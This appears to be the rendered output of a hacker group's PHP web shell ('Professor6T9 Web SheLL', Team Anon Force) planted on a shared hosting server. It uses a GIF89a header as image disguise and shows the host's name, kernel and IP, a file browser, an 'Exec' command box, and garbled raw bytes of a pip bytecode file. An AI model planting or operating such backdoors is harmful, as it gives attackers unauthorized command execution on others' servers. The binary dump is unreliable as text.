GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
hc_python
/
lib64
/
python3.12
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : glibc.cpython-312.pyc
� �0i� � �@ � d dl mZ d dlZd dlZdd�Zdd�Zdd�Zdd�Zy) � )�annotationsNc �. � t � xs t � S )z9Returns glibc version string, or None if not using glibc.)�glibc_version_string_confstr�glibc_version_string_ctypes� � �H/opt/hc_python/lib/python3.12/site-packages/pip/_internal/utils/glibc.py�glibc_version_stringr s � �'�)�J�-H�-J�Jr c � � t j dk( ry t j d� } | �y| j � \ }}|S # t t t f$ r Y yw xY w)z@Primary implementation of glibc_version_string using os.confstr.�win32N�CS_GNU_LIBC_VERSION)�sys�platform�os�confstr�split�AttributeError�OSError� ValueError)�gnu_libc_version�_�versions r r r se � � �|�|�w�����:�:�&;�<���#��%�+�+�-� ��7� �N�� �G�Z�0� ���s �A �A �A�Ac � � ddl } | j d� } |j }| j |_ |� }t |t � s|j d� }|S # t $ r Y yw xY w# t $ r Y yw xY w# t $ r Y yw xY w)z=Fallback implementation of glibc_version_string using ctypes.r N�ascii)�ctypes�ImportError�CDLLr �gnu_get_libc_versionr �c_char_p�restype� isinstance�str�decode)r �process_namespacer �version_strs r r r s� � ���"�"�K�K��-���0�E�E�� $*�?�?�� �+�-�K��k�3�'�!�(�(��1�����G � ����$ � ���� � � ��s3 �A �A/ �A>